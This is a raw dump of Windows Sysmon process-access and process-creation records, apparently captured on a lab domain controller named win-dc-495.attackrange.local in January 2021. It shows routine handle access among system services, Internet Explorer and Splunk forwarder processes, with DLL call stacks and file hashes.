13:58:42.554{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCR
T4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:42.554{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:43.179{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:43.179{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.695{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9414-6005-0F05-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.695{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:44.695{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.695{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:44.695{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.695{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9414-6005-0F05-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.695{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9414-6005-0F05-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.555{59A5CD1D-9414-6005-0F05-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.539{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.382{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:44.382{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\system32\explorerframe.dll+154e|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+d018a|C:\Windows\SYSTEM32\IEFRAME.dll+d1649|C:\Windows\SYSTEM32\IEFRAME.dll+d1e22|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b2d|C:\Windows\SYSTEM32\IEFRAME.dll+d970b|C:\Windows\SYSTEM32\IEFRAME.dll+1196f|C:\Windows\SYSTEM32\IEFRAME.dll+129b8|C:\Windows\SYSTEM32\IEFRAME.dll+12c00|C:\Windows\SYSTEM32\IEFRAME.dll+13101|C:\Windows\SYSTEM32\IEFRAME.dll+2a8506|C:\Windows\SYSTEM32\IEFRAME.dll+152534|C:\Windows\SYSTEM32\IEFRAME.dll+14ab1 
10341000x800000000000000013308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+d018a|C:\Windows\SYSTEM32\IEFRAME.dll+d1649|C:\Windows\SYSTEM32\IEFRAME.dll+d1e22|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b2d|C:\Windows\SYSTEM32\IEFRAME.dll+d970b|C:\Windows\SYSTEM32\IEFRAME.dll+1196f|C:\Windows\SYSTEM32\IEFRAME.dll+129b8|C:\Windows\SYSTEM32\IEFRAME.dll+12c00|C:\Windows\SYSTEM32\IEFRAME.dll+13101|C:\Windows\SYSTEM32\IEFRAME.dll+2a8506|C:\Windows\SYSTEM32\IEFRAME.dll+152534 10341000x800000000000000013307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+d018a|C:\Windows\SYSTEM32\IEFRAME.dll+d1649|C:\Windows\SYSTEM32\IEFRAME.dll+d1e22|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b2d|C:\Windows\SYSTEM32\IEFRAME.dll+d970b|C:\Windows\SYSTEM32\IEFRAME.dll+1196f|C:\Windows\SYSTEM32\IEFRAME.dll+129b8|C:\Windows\SYSTEM32\IEFRAME.dll+12c00|C:\Windows\SYSTEM32\IEFRAME.dll+13101|C:\Windows\SYSTEM32\IEFRAME.dll+2a8506|C:\Windows\SYSTEM32\IEFRAME.dll+152534|C:\Windows\SYSTEM32\IEFRAME.dll+14ab1 10341000x800000000000000013306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9415-6005-1005-00000000A301}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:45.663{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:45.663{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9415-6005-1005-00000000A301}6760C:\Program 
